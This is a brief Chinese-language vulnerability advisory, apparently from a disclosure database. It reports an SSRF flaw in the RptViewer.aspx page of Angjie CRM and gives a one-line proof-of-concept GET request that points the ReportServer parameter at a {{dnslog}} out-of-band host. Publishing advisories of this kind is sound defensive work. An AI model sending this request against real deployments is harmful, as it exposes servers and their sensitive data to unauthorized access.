昂捷CRM RptViewer.aspx存在SSRF漏洞

日期: 2025-07-31 | 影响软件: 昂捷CRM | POC: 已公开

漏洞描述

昂捷CRM RptViewer.aspx存在SSRF漏洞,攻击者可以利用该漏洞获取服务器敏感信息。

PoC代码

GET /WebForms/RptViewer.aspx?ReportServer=http://{{dnslog}}

相关漏洞推荐